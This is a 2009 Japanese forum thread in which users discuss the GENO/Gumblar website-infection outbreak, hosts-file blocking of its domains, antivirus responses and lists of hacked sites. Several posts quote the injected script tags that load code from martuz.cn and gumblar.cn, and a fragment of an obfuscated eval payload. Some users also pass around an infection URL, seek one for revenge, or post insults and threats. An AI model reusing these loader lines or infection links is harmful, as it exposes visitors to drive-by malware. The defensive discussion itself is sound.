* Accesses Registry key "HKLM\SoFtWARE\Microsoft\Windows nT\currentversion\Drivers32".
[ Process/window information ]
* Creates process "CMD.EXE".
[ Signature Scanning ]
* c:\sample.exe (15872 bytes) : no signature detection.
* C:\_.e (15872 bytes) : no signature detection.
255:192.168.0.774
09/05/17 16:02:33 MDg7JZzS0
ウィルスバスターは何してるの?
256:192.168.0.774
09/05/17 16:05:39 VMAXjN900
お前らウイルスセキュリティ馬鹿にしてるけどいい加減にしろよ?
2ちゃんの連帯感みたいなの感じちゃって調子に乗ってるんだろ?
正直、 うざいから死んでwww(爆藁
信者とか妄想してる暇があったら親孝行しろw糞ww
どうせリアルじゃペコペコしてんだろw
ウイルスセキュリティ以下の人間だよね?
君たちww
妄想と批判しか出来ない哀れな奴らw
ウイルスセキュリティ叩いてどうなる?
お前らマヂ頭使えw
257:192.168.0.774
09/05/17 16:06:51 ovH4yFdR0
>>255
更新キターって聞いたけど自分のところでは黙ったままだ
258:192.168.0.774
09/05/17 16:07:03 MDg7JZzS0
ウィルスバスターいれてるんだけど役に立たないの?
対応してくれないの?
259:192.168.0.774
09/05/17 16:08:37 61lOiijw0
pdf見るのにFoxitReader使ってて、AdobeReaderはインスコしてないんだが、
これってFoxitReader経由でも感染するのか?
260:192.168.0.774
09/05/17 16:09:40 F5MPX4G50
>>246
それはいいね、前回のGENO騒動までアップデートを全くしてなかったから危なかった
261:192.168.0.774
09/05/17 16:12:35 MP/sWvjo0
>>257
俺のノートンもライブアップデートが沈黙してた。
仕方ないので手作業で定義ファイル落としてきた。あくまでもノートンの話。
xxxp://www.omora.pink-no1.net/の入った先menu/menu1.htmlが
危険度200%
かなり危険なURLです。友人のPCを壊すのに利用しましょう!
絶対に踏んではいけません。
これ危ないのかな?
262:blocktxt
09/05/17 16:18:29 6zykGUMd0
前のうpろだ理由は分からないけど削除されたみたいなんで
こっちに上げておきます。
URLリンク(uproda.2ch-library.com)
263:192.168.0.774
09/05/17 16:18:48 KdAQNY9c0
テメーのサイト見たらウィルスに感染したぞゴルァ路線はどうだろう
264:192.168.0.774
09/05/17 16:19:19 1tk6kEt+0
>>261
ここにはGenoいないっぽいけどな。
リンク先に潜んでるんだろうか。
265:192.168.0.774
09/05/17 16:22:29 MP/sWvjo0
>>264
㌧。一応入らないにしとく。
266:192.168.0.774
09/05/17 16:22:31 Grc1h74N0
脅威だな
救急車依頼の恐怖を感じてるんだけど
267:192.168.0.774
09/05/17 16:23:07 oRKg9iVz0
>>266
どんだけ大昔のだよww
268:192.168.0.774
09/05/17 16:29:20 MDg7JZzS0
ウイルスバスターはなにしてるの?
なにもしないの?
269:192.168.0.774
09/05/17 16:30:53 f7PXip0E0
GENOウイルス対策
■hostsファイル書き換え
hostsファイルに以下の行を追加
127.0.0.1 zlkon.lv
127.0.0.1 gumlar.cn
127.0.0.1 martuz.cn
↑これをちょっと説明して頂けませんか?
270:192.168.0.774
09/05/17 16:33:10 7TaPV4fL0
zlkon.lv
gumlar.cn
martuz.cn
に飛ぼうとすると127.0.0.1に飛ぶってことです。
要するに本来のIPに飛ぼうとするのを防止します。
271:192.168.0.774
09/05/17 16:36:06 CuLRuFv70
>>269
右側のzlkon.lvとかにアクセスしようとする
↓
hostsの内部処理で127.0.0.1に読み替えてそこにアクセスする
↓
127.0.0.1は自分自身なので本当のzlkon.lvのIPアドレスにはアクセスしない
↓
安全
272:192.168.0.774
09/05/17 16:36:26 MDg7JZzS0
ウィルスバスターな何やってるんだよ
早くしてくれよ
感染してるかもしれないのに
273:192.168.0.774
09/05/17 16:36:46 0CtfCDPI0
>>186
これも martuz.cn に飛ばすんだな
<script src=//ma"+"rtuz.cn/vid/?id="+j+"><\/script>
martuz.cnにアク禁くらわせるだけでかなり防げそうだな、こりゃ
274:192.168.0.774
09/05/17 16:37:45 7UVnacRX0
www■laqoo.net■kyouun■pet■index.html
でavast先生がredirector H8検知した。
侵入前にブロックできたって認識でいいのかなぁ。
おかしな挙動は見られないが
275:192.168.0.774
09/05/17 16:40:59 uRUXabUv0
>>269
初期の頃は直接IPが記述してあって、感染中に.exeをダウンロードする為そこに繋ごうとしていた。
ウィルス対策ソフトでそのIPがBANされつつある中、zlkon.lvとかgumlar.cnとか適当なドメイン名を経由して.exeのダウンロードを行おうとする手段が登場
ソフトの対策遅れでまだその経由した方からは繋がっちゃったりが有るんで、
windows標準の "ホスト名>IPの変換を手動で上書きする" 方法によってzlkon.lvやgumlar.cnに繋がないようにする
276:192.168.0.774
09/05/17 16:41:05 0CtfCDPI0
>>198
gumblar.cn にご案内~
<script src=//gumblar.cn/rss/?id="+j+"><\/script>
277:192.168.0.774
09/05/17 16:42:04 W3Qz58cJ0
>>262
落としたいけど元々住人じゃないんでパスが判らんです
GENOじゃないですよね?
278:192.168.0.774
09/05/17 16:45:11 f7PXip0E0
>>270
ありがとうございます
127.0.0.1がマシン自体を表すアドレスってことは、今調べて分かったのですが
firefoxのAdblock Plusのフィルタリストに「zlkon.lv」「gumlar.cn」「martuz.cn 」
を入れても阻止できるんでしょうか?
279:192.168.0.774
09/05/17 16:48:13 f7PXip0E0
>>271
リロードし忘れたorz
分かりやすい説明ありがとうございます
280:192.168.0.774
09/05/17 16:49:30 6zykGUMd0
>>274
(function(rzm){var x34p='%';eval(unescape(
('v.61r.20a.3d.22.53cript.45ng.69ne.22.2cb.3d.22Version()+・・・・・・
URLリンク(www.virustotal.com)
281:192.168.0.774
09/05/17 16:51:53 0CtfCDPI0
>>264 いないよね。でもこんなスクリプトの化け物みたいなページにはブラウザでアクセスしたくないわw
282:192.168.0.774
09/05/17 16:54:08 61lOiijw0
ググったけどAdobeReaderインストールしてなくてFoxit使っててもヤバいのね・・・
Foxitも環境設定でJavaScript切らないと駄目か
283:192.168.0.774
09/05/17 16:55:23 6zykGUMd0
>>264
無し
284:192.168.0.774
09/05/17 17:01:44 7UVnacRX0
>>280
本件まんまですなぁ(´-`)
なんでペットの名前サイトなんかがやられてんだよw
恐ろしくてWEB周れないじゃんこれ
285:192.168.0.774
09/05/17 17:01:54 0CtfCDPI0
>>274
gumblar.cn ご案内コース
<script src=//gumblar.cn/rss/?id="+j+"><\/script>
286:192.168.0.774
09/05/17 17:02:08 LQE1Ao+t0
>>282 俺も使ってる それ気になるな。
287:192.168.0.774
09/05/17 17:11:33 gLr/8LT/0
hostsファイルに以下の行を追加というのは
上と同じように#の中に入れればいいのでしょうか
288:192.168.0.774
09/05/17 17:12:13 MP/sWvjo0
>>264>>281>>283 お手数お掛けしました。
~かなり判定厳しめに設定してあります。~
あっちを立てるとコッチが立たず な感じみたいですね。
289:192.168.0.774
09/05/17 17:13:54 CuLRuFv70
>>287
#はその行を無効にする(コメント扱いにする)から不要
127.0.0.0 localhost
というのが普通は最初に入ってるはずだからそれと同じ書き方
290:192.168.0.774
09/05/17 17:14:57 1tk6kEt+0
>>287
先頭に#があるのはコメント行。
#なしで行追加。
291:192.168.0.774
09/05/17 17:16:51 1tk6kEt+0
>>289
なぜか数ヶ月前にWindows Defenderがlocalhostの記述行を削除したよ。
292:192.168.0.774
09/05/17 17:19:00 q8u6cZFi0
やっぱここが一番建設的なスレだな
293:192.168.0.774
09/05/17 17:22:25 gLr/8LT/0
>>289-290
ありがとうございました
294:192.168.0.774
09/05/17 17:23:07 f7PXip0E0
>>278誰か分かりませんでしょうか?
295:192.168.0.774
09/05/17 17:25:09 1tk6kEt+0
>>294
たぶん大丈夫だと思うけど、hosts書きかえちゃった方がより確実。
296:192.168.0.774
09/05/17 17:28:02 0CtfCDPI0
>>294
adblockがどんなもんかは知らんけど、firefoxしか使わないんなら大丈夫なんじゃね?
ただサイトはこれからもどんどん増えるので、この3つさえ入れときゃ明日も安心ってわけじゃないんだけどね
adobeを最新にして全てを忘れるのが一番幸せかも試練
297:192.168.0.774
09/05/17 17:30:02 f7PXip0E0
>>295-296
ありがとうございます、気を付けます
298:192.168.0.774
09/05/17 17:32:19 6zykGUMd0
Spybot - Search & Destroy もhosts書き換えますね
299:192.168.0.774
09/05/17 17:39:49 7TaPV4fL0
はい。
300:192.168.0.774
09/05/17 17:49:24 6zykGUMd0
martuz.cnノートンが対応
URLリンク(safeweb.norton.com)
301:192.168.0.774
09/05/17 17:49:53 7TaPV4fL0
ノートンGJ
302:192.168.0.774
09/05/17 17:58:11 Grc1h74N0
やべえノートンに乗り換えるときがきたかも
303:192.168.0.774
09/05/17 18:01:36 mIA3fiU30
>>300
おお
304:192.168.0.774
09/05/17 18:05:57 O4C38sHjP
今北用ってもう誰か作ってる?
無いなら作るけど
305:192.168.0.774
09/05/17 18:24:33 1tk6kEt+0
>>300
その一方でgumlar.cnは安全。
URLリンク(safeweb.norton.com)
gumlar.cnは実際にもう動作停止状態なのかな?
306:192.168.0.774
09/05/17 18:24:59 Pub4l/uF0
zlkon.lvとgumlar.cnは本当にこのドメインなのか?
SCFに遮断させたら、martuz.cnはおkらしいが、↑二つは「DNSで解決されていません追加しますか?」
だとよ。
307:192.168.0.774
09/05/17 18:25:21 QPPdxGJ80
昨日このウイルスを知って不安だったので書き込みします
【OS】
XP
【使用セキュリティソフト】
avast
【疑った理由】
ニコニコの動画を見る際に『JavaScriptが無効になってます』といったような文字が出て
最新のフラッシュプレイヤーを入れてくださいとの表記が出た。
【症状】
PCがとても重いときがあり、MWPで曲を聴いてたのが音飛びが酷くなり
フリーズ直前までいったこともあった(作業中ではあったが・・・)
【確認手段】
cmd.exe、regedit.exeは使用可能
sqlsodbc.chmのサイズ確認
【結果】
フラッシュプレイヤーを最新にして以降ニコニコは見れるようになった
今のところ怪しげなパケットはなさそうだが不安
308:192.168.0.774
09/05/17 18:28:15 /SoDyIML0
>>300
js切ってても見れるようにしとけよ
309:192.168.0.774
09/05/17 18:28:42 6zykGUMd0
>>305
ほんとだ???
310:192.168.0.774
09/05/17 18:28:53 Pl/Rjd540
>307
報告御苦労
311:192.168.0.774
09/05/17 18:28:59 f7PXip0E0
GENOウイルス対策
■adobe flashplayerを最新版に更新
Adobe Flash PlayerとShockwave Flashって同じものですか?
312:192.168.0.774
09/05/17 18:30:14 Pub4l/uF0
>>311
違う。
313:192.168.0.774
09/05/17 18:32:32 kVP/8H1t0
>>307
それ原因は別だから安心しなさい。
314:192.168.0.774
09/05/17 18:32:51 1tk6kEt+0
>>306
すまん。おれがb抜いちゃってるわw
gumlar.cnでなくgumblar.cnね。
315:192.168.0.774
09/05/17 18:33:56 6zykGUMd0
5/15 21:00ごろにgumblar.cnのAレコードの登録がなくなりました。
Aレコードがなくなりましたのでとりあえずgumblar.cnは意味がなくなりました。ただ、
レジストラによる対策ではない?ようなので
再度Aレコードが登録される可能性があるので、引き続き注意は必要です。
これか?
URLリンク(jvnrss.ise.chuo-u.ac.jp)
316:192.168.0.774
09/05/17 18:34:11 f7PXip0E0
>>312
んじゃあShockwave Flashってのは最新版に更新しなくてもいいんですよね?
更新のしかた分からないけどw
317:192.168.0.774
09/05/17 18:34:48 jSw80LZp0
>>314
何で抜くんだよ
まさか手打ちなのか?普通コピーだろ
318:192.168.0.774
09/05/17 18:38:45 1tk6kEt+0
>>317
悪かったよぉ。>>269をコピペしちゃったんだよぉ。
319:192.168.0.774
09/05/17 18:39:36 kVP/8H1t0
手打ち職人の朝は早い。
320:192.168.0.774
09/05/17 18:39:49 4DIp3Q850
おい殺すぞ
>>225踏んでサブPC動かなくなった
殺人予告
>>225魔自己rろす
321:192.168.0.774
09/05/17 18:41:13 7TaPV4fL0
もしかして今GENOウイルスまとめサイト重い?
322:192.168.0.774
09/05/17 18:41:36 FkoNww+u0
>>318
今確認してきたら、GENOウィルスチェッカーのhostsファイルもgumlarになっとった。
323:192.168.0.774
09/05/17 18:42:05 Pub4l/uF0
gumblar.cnにしても同じだ。
zlkon.lvも
324:192.168.0.774
09/05/17 18:42:23 7TaPV4fL0
>>317,318
てことはここのも間違えている悪寒w
ここのサイトの人もしみてたら修正求む
URLリンク(geno.2ch.tc)
325:192.168.0.774
09/05/17 18:43:56 4DIp3Q850
頼む('A`)
誰か地獄少女にアクセスしたんだが404だ
代わりにGEOウィルスで復讐したいんでURLくれー('A')
326:192.168.0.774
09/05/17 18:45:08 1tk6kEt+0
>>323
有効なAレコードを消しちゃってる状態だから名前解決できないんでしょ。
327:192.168.0.774
09/05/17 18:47:09 QPPdxGJ80
>>313
もしよろしければ詳しく教えていただけないでしょうか?
328:192.168.0.774
09/05/17 18:49:30 kVP/8H1t0
NGID 4DIp3Q850 、と。よしスッキリ。
329:192.168.0.774
09/05/17 18:50:18 Pub4l/uF0
詳しくないけど、どちらも逆引き出来ないね。
URLリンク(safeweb.norton.com)
で評価が出ることと、DNSが有効化は別問題?
330:192.168.0.774
09/05/17 18:52:45 1PB83W/v0
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ('A`) ? ? ? ? なんだか無償にコピペしたくなる
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ? なのに初心者にはコピペできない
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
331:192.168.0.774
09/05/17 18:53:17 E5NPdo1R0
>>316
Shockwave player と Flash playerは別物。
ごっちゃにせず、目を見開いてよく読むこと。
332:192.168.0.774
09/05/17 18:53:35 1tk6kEt+0
>>329
評価した段階ではAレコード有効だったんだと思う。
で、Nortonの評価がグリーンになったところで再度アクティブに
なるかもしれん。
333:192.168.0.774
09/05/17 18:53:45 Dx3JCXno0
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ('A`) ? ? ? ? なんだか無償にコピペしたくなる
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ? なのに初心者にはコピペできない
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
334:192.168.0.774
09/05/17 18:56:04 Pub4l/uF0
つまりキャッシュ情報表示してたのね。
Nortonのは今日初めて使ったが、意味ないサービスだな
335:192.168.0.774
09/05/17 18:57:24 +UWQkKTW0
まとめサイトが感染したってマジ?
336:192.168.0.774
09/05/17 19:00:24 PGm7MFXg0
>>335
ソースはお前の頭ん中か?
337:192.168.0.774
09/05/17 19:02:16 f7PXip0E0
>>331
どっちもwikiで調べようとすると「Adobe Flash」ってページがでるから
同じ物なのかと思いましてw
adobe flashplayerだけ最新版にしとけばOKってことですよね?
338:192.168.0.774
09/05/17 19:02:19 +UWQkKTW0
>>336
いや、人づてに聞いただけ
事実じゃないならそれでいい
339:192.168.0.774
09/05/17 19:09:37 Rr9xCLR70
>>244
通常使うブラウザは火狐にしとけ。
340:192.168.0.774
09/05/17 19:10:00 DAUhxtRJ0
441 名前: ムラサキサギゴケ(catv?)[sage] 投稿日:2009/05/16(土) 23:32:08.96 ID:K/FFIX2k
・小林製薬【対策済】
・BIG-server.com【対策済】
・ウェルネス(医療情報提供企業)【対策済】
・薬事日報社【対策済】
・国交省中部地方整備局岐阜国道事務所【対策済】
・全日本民医連【対策済】
・総合ホビー展示即売会「ビコン」公式サイト【対策済】
・GENO(PC通販ショップ)【キャッシュ削除済】
・NHT紀尾井町グループ(自毛植毛斡旋企業)【対策済】
・SayMove!【対策済】
・ライブハウス「あさがやドラム」【対策済】
341:192.168.0.774
09/05/17 19:12:00 pC5ZVjuD0
Warning: fopen() [function.fopen]: Unable to access log/2009516.dat in /virtual/owata-net/public_html/owata-net.com/index.php on line 123
Warning: fopen(log/2009516.dat) [function.fopen]: failed to open stream: No such file or directory in /virtual/owata-net/public_html/owata-net.com/index.php on line 123
毎日チェックしてるサイトでこんなの表示されたけど意味がわからない。
Warning:とか出てるから気味悪いけどgenoと関係ないよね?
セキュ板にも貼ったけど荒れててダメっぽい!
342:192.168.0.774
09/05/17 19:14:49 7TaPV4fL0
チェッカーに通してみて
343:192.168.0.774
09/05/17 19:15:38 aydvb1+C0
「便所の落書き」「痰ツボ」と罵倒されてきた2ちゃんねるがGENOウィルス騒動の解決に
一番大きく貢献するまで、あと五日。
(「その時歴史が動いた」 2078年5月放送予定)
344:192.168.0.774
09/05/17 19:16:15 kuRpimDu0
>340
コピペにこんなこと言うのもなんだが
×総合ホビー展示即売会「ビコン」
○総合ホビー展示即売会「ホビコン」
ホビーコンプレックスの略でホビコンね。
345:192.168.0.774
09/05/17 19:18:44 6zykGUMd0
★11荒れすぎ w
346:192.168.0.774
09/05/17 19:20:41 4g69K7//0
★1~2スレあたりはセキュ板とν速がほとんどだったからね
同人・VIPから流れてきてひどいことになった
347:192.168.0.774
09/05/17 19:21:07 qd90in+R0
荒れてるか?
あれくらい大したことないと思うけど
348:192.168.0.774
09/05/17 19:26:28 NUScdqsg0
Chromeも対象になったのが出たとかニュー即で言われたり
背景黒いほうのwikiの「感染したと~」とアドレスがおかしいとかセキュ板で言われたり
またなんかいろいろ来たらしいけど結局どうなってんのこれ
349:192.168.0.774
09/05/17 19:28:52 OKDvuiXi0
IDも出ないセキュ板の情報なんて信用出来んわ
自演し放題だし
350:192.168.0.774
09/05/17 19:29:20 MP/sWvjo0
何か一行だけになっちゃったよチェッカーのところ。
■hostsファイル書き換え
hostsファイルに以下の行を追加
127.0.0.1 martuz.cn
ひょっとしてgumblar.cn zlkon.lv要らないの?
127.0.0.1 zlkon.lv
127.0.0.1 gumblar.cn
127.0.0.1 martuz.cn
351:192.168.0.774
09/05/17 19:30:07 qTLKsZ5C0
見れない=感染じゃなくて
ただの集中でアクセスできないだけでしょ
352:192.168.0.774
09/05/17 19:30:13 q9beek69O
セキュリティ板 GENOスレ11の9で紹介されていた、
ポート135, 445を閉じたらネットに繋げなくなった。
元に戻そうにもプロパティが表示されない。
デバイスマネージャーやサービスの画面を閉じようとすると
プロパティを閉じろと言われるけど、Alt+Tabで探しても見つからない。
それにコンパネの右半分が真っ白。データフォルダの方は正常に表示されるのに。
誰か助けてください。
353:192.168.0.774
09/05/17 19:32:01 6zykGUMd0
>>350
まだ安心できない
354:192.168.0.774
09/05/17 19:33:43 OKDvuiXi0
ESCなりALT+F4なりで全部終了させて再起動したのかね
右半分が真っ白とか一時的な描画異常なんて誰でも経験する事で
再起動すればまず直る
再起動しても同じというならシラネ
355:192.168.0.774
09/05/17 19:34:19 MP/sWvjo0
>>353
いや、漏れて来るのは解ってるんだけど・・・。
私のトリップは◆XcxlmnqGqUです←―この人何処にいるのかしら。
356:192.168.0.774
09/05/17 19:34:38 4g69K7//0
hxxp://skyhighpremium■com
ここもかな。チェッカーでは1000%とでた
アクセスしたくないし、ソースチェッカー規制くらってる
357:192.168.0.774
09/05/17 19:35:22 DAUhxtRJ0
>>344
・小林製薬【対策済】
・BIG-server.com【対策済】
・ウェルネス(医療情報提供企業)【対策済】
・薬事日報社【対策済】
・国交省中部地方整備局岐阜国道事務所【対策済】
・全日本民医連【対策済】
・総合ホビー展示即売会「ホビコン」【対策済】
・GENO(PC通販ショップ)【キャッシュ削除済】
・NHT紀尾井町グループ(自毛植毛斡旋企業)【対策済】
・SayMove!【対策済】
・ライブハウス「あさがやドラム」【対策済】
358:192.168.0.774
09/05/17 19:45:27 0KCBdJWL0
612 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/17(日) 19:43:11 ID:I820zXBQ0
スレリンク(software板:611番)
611 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/17(日) 19:30:30 ID:/KeDK9cs0
noscriptの「ブックマークから開いたサイトを許可する」って
履歴とブックマークの管理のウィンドウの履歴から開いても適用されるんだな
www.seibidoshuppan.co.jpここを開き直そうとしたらFlashが再生されたからうんこ漏らしたぜ・・・
martuz.cnを弾いてくれたから事なきだったけど
一応気になったからコピペ
そもそも「ブックマークから開いたサイトを許可する」はチェック入れるべきじゃないと思うけど
359:352
09/05/17 19:48:32 q9beek69O
>>354
それが再起動しても直らんのです。
書き忘れましたがOSは2kです。
携帯じゃ対応策調べようにもままならず…
些細なことでもいいんで、心当たりあれば教えてください。
360:192.168.0.774
09/05/17 19:50:13 7TaPV4fL0
>>358
サンキュー
361:192.168.0.774
09/05/17 19:51:58 4g69K7//0
>>358
^w^;
362:192.168.0.774
09/05/17 19:57:17 OKDvuiXi0
>>359
今内容見てきたがRemote Procedure Call停止って普通しないんじゃね?
そもそもあの内容が正しいかどうかも分からんから試す気にもならん
ただ135/445を閉じた方がいいのは事実なので自分はルータ側で閉じている
(と言うよりデフォルトで閉じられてたが)
元々あちらの板はID出ないし情報信用出来ないよ、見る価値無い
363:192.168.0.774
09/05/17 20:13:01 MpyKmePW0 BE:660438427-2BP(0)
なんだかいろいろご迷惑をおかけしております
>まとめ(黒)が見れない
急激にアクセス増えたので鯖が死にそうになってるみたいです
15時からの5時間でリファラーが2000件以上増えました
>メニューのリンクがおかしい
修正しました
364:192.168.0.774
09/05/17 20:17:00 4g69K7//0
>>188
AVG Anti-Virus Version 86
スレリンク(sec板:3番)
Q5. 2chのログにウィルスが検出されたんですけど
A5. ログに貼られたコードだけではPC内で感染行動をおこすことはできないので無害です。
AVG User Interface → ツール → 高度な設定 → 常駐シールド → 例外 に
ログフォルダを追加することで回避できます。
365:352
09/05/17 20:23:37 q9beek69O
>>362
ありがとうございます。いい勉強になりました… orz
迷惑ついでと言っては何ですが、この質問に適切な板を教えてもらえませんか?
板名からすると、PCサロン、windowsあたり?
366:192.168.0.774
09/05/17 20:24:12 zfzbOIpv0
>>363
とりあえず移転も検討してみたら?
URLリンク(wikiwiki.jp)
こことかに。解析も出来るみたい。
367:192.168.0.774
09/05/17 20:25:08 sDfaXn0wO
なぜGENOまとめWikiが劇重いんですか
368:192.168.0.774
09/05/17 20:27:26 sDfaXn0wO
>>363見て了解しました。無意味なレス消費して大変申し訳ないです。
369:192.168.0.774
09/05/17 20:28:09 OKDvuiXi0
>>365
この辺でいいんでない?
【マジレス】超初心者の質問に答えるスレ113【エスパー】
スレリンク(win板)
質問の基本だけど、何をしたかは勿論OSやその他環境等なるべく細かく書くようにね
その方が回答者も適切な回答を提示しやすいから